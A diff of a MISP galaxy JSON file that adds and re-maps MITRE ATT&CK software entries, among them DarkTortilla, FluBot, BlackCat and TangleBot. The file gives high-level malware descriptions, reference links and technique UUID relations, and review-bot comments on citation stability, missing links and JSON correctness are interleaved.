+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "df350889-4de9-44e5-8cb3-888b8343e97c",
+ "value": "metaMain - S1059"
+ },
{
"description": "[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)",
"meta": {
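Review bot: the third `refs` entry for metaMain is a Google Docs edit link (`https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm`), which can be made private or deleted at any time and carries an `/edit` path that is not a stable citation. This same patch already replaces an unreachable Novetta URL with a dated web.archive.org snapshot in `@@ -50513,8 +53305,8 @@`; apply the same treatment here (an archive snapshot, or the published SentinelLabs technical appendix URL) so the second Metador reference in the description does not silently go dark.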
@@ -39009,6 +41208,222 @@
"uuid": "4e6b9625-bbda-4d96-a652-b3bb45453f26",
"value": "RemoteCMD - S0166"
},
+ {
+ "description": "[DarkTortilla](https://attack.mitre.org/software/S1066) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://attack.mitre.org/software/S1066) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://attack.mitre.org/software/S0331), AsyncRat, [NanoCore](https://attack.mitre.org/software/S0336), RedLine, [Cobalt Strike](https://attack.mitre.org/software/S0154), and Metasploit.(Citation: Secureworks DarkTortilla Aug 2022)",
+ "meta": {
+ "external_id": "S1066",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1066",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis"
+ ],
+ "synonyms": [
+ "DarkTortilla"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "5faaf81a-aa5b-4a4b-bae5-522439e068f8",
+ "value": "DarkTortilla - S1066"
+ },
{
"description": "[FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)",
"meta": {
@@ -39176,6 +41591,125 @@
"uuid": "72911fe3-f085-40f7-b4f2-f25a4221fe44",
"value": "FoggyWeb - S0661"
},
+ {
+ "description": "[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)",
+ "meta": {
+ "external_id": "S1067",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1067",
+ "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/",
+ "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon"
+ ],
+ "synonyms": [
+ "FluBot"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "16d73b64-5681-4ea0-9af4-4ad86f7c96e8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24a77e53-0751-46fc-b207-99378fb35c08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aa78dfd-cb6f-4c70-9408-137cfd96be49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5ca3c7ec-55b2-4587-9376-cf6c96f8047a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dc01774a-d1c1-45fb-b506-0a5d1d6593d9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fd211238-f767-4599-8c0d-9dca36624626",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "f5ff006c-702f-4ded-8e60-ca6c540d91bc",
+ "value": "FluBot - S1067"
+ },
{
"description": "[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)",
"meta": {
@@ -39564,6 +42098,171 @@
"uuid": "f464354c-7103-47c6-969b-8766f0157ed2",
"value": "FIVEHANDS - S0618"
},
+ {
+ "description": "[BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)",
+ "meta": {
+ "external_id": "S1068",
+ "mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1068",
+ "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat",
+ "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"
+ ],
+ "synonyms": [
+ "BlackCat",
+ "ALPHV",
+ "Noberus"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "50c44c34-3abb-48ae-9433-a2337de5b0bc",
+ "value": "BlackCat - S1068"
+ },
{
"description": "[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)",
"meta": {
@@ -40108,6 +42807,110 @@
"uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
"value": "PUNCHBUGGY - S0196"
},
+ {
+ "description": "[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)",
+ "meta": {
+ "external_id": "S1069",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1069",
+ "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19"
+ ],
+ "synonyms": [
+ "TangleBot"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1d1b1558-c833-482e-aabb-d07ef6eae63d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "351ddf79-2d3a-41b4-9bef-82ea5d3ccd69",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "73c26732-6422-4081-8b63-6d0ae93d449e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d8940e76-f9c1-4912-bea6-e21c251370b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "68156e5a-4c3a-46dd-9c5e-c0bfdec6651f",
+ "value": "TangleBot - S1069"
+ },
{
"description": "[Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021)",
"meta": {
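Review bot: the TangleBot description explicitly cross-references FluBot (`[FluBot](https://attack.mitre.org/software/S1067)`), but the `related` array only carries `uses` relations to technique UUIDs and adds no relation to the FluBot cluster introduced earlier in this patch (uuid `f5ff006c-702f-4ded-8e60-ca6c540d91bc`). If the generator intentionally emits only ATT&CK `uses` relationships that is fine, but the family-to-family link then exists only in free text and is not followable in MISP correlation; either add the relation or state in the PR description that software-to-software links are out of scope for this import.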
@@ -40564,6 +43367,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"tags": [
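Review bot: the `dest-uuid` `02c5abff-30bf-4703-ab92-1f6072fae939` inserted here is added the same way to several other software entries below (`@@ -43545,6 +46351,13 @@`, `@@ -48471,6 +51263,13 @@`, `@@ -50028,6 +52813,13 @@`, `@@ -51005,6 +53797,13 @@`, `@@ -58134,6 +60899,48 @@`), and the context lines do not identify which cluster this is or which technique the UUID resolves to. Reviewers can only check these opaque UUID-level insertions against the attack-pattern cluster, so the commit message or PR description should name the technique (external ID and title) that was introduced or re-mapped in this ATT&CK release; otherwise each of these hunks is being merged on trust.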
@@ -41181,13 +43991,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
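Review bot: this hunk drops the `uses` relation to `b3d682b6-98f2-4fb0-aa3b-b4df007ca70a`, and the same UUID is removed from other existing entries further down (`@@ -47523,13 +50322,6 @@`, `@@ -51061,13 +53860,6 @@`, `@@ -51347,14 +54146,14 @@`) while the new metaMain and DarkTortilla clusters in this same patch still reference it. That pattern is consistent with upstream procedure examples being deleted rather than the technique being revoked, but it is precisely the change a downstream instance with these tags already applied will notice; please say in the commit message which of the two it is, so nobody reads the removals as a generator regression.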
@@ -41196,14 +43999,14 @@
"type": "uses"
},
{
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
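Review bot: read this hunk as one removal plus one addition rather than two substitutions: `related` is kept sorted by `dest-uuid`, so deleting `c848fcf7-6b62-4bde-8216-b6c157d48da0` and inserting `d511a6f6-4a33-41d5-bc95-c343875d1377` makes the unchanged `cba37adb-d6fb-4610-b069-dd04c0643384` object appear to move. The `c848fcf7` relation is removed from many more entries below (`@@ -43615,13 +46428,6 @@`, `@@ -44339,13 +47138,6 @@`, `@@ -45231,13 +48030,6 @@` and others) and `d511a6f6` is added to many (`@@ -45931,6 +48716,13 @@` onward). A sentence in the PR description naming the technique behind each of those two UUIDs would let reviewers confirm this is the intended upstream re-mapping and not a mixed-up pair.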
@@ -41241,6 +44044,9 @@
"refs": [
"http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/",
"https://attack.mitre.org/software/S0322"
+ ],
+ "synonyms": [
+ "HummingBad"
]
},
"related": [
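Review bot: the new `synonyms` array for S0322 holds only `"HummingBad"`, which matches the convention used by the clusters added in this patch (metaMain, DarkTortilla, FluBot and TangleBot each list their own name as a synonym), so the shape is consistent. The entry's `value` line is outside this hunk's context; please confirm it reads `HummingBad - S0322` with the same casing, since a synonym that differs from `value` changes how MISP resolves the tag on events that already carry it.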
@@ -43545,6 +46351,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -43615,13 +46428,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -43649,13 +46455,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
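Review bot: removing the last element of `related` is handled correctly here: the hunk deletes the preceding object's `},` together with the `f72eb8a8-cd4c-461d-a814-3f862befbf00` block and keeps the unchanged closing `}`, so no trailing comma is left before `],`. The same last-element removal recurs several times below (`@@ -45784,13 +48576,6 @@`, `@@ -47690,13 +50489,6 @@`, `@@ -51750,13 +54549,6 @@`, `@@ -52971,13 +55763,6 @@`, `@@ -54253,13 +57045,6 @@`, `@@ -57404,13 +60175,6 @@`); a single slip in any of them would make the whole cluster file unparsable, so the CI for this PR should run a JSON parse over the changed cluster file, not just a diff review.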
@@ -44339,13 +47138,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -44867,6 +47659,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -45231,13 +48030,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -45784,13 +48576,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b",
@@ -45931,6 +48716,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
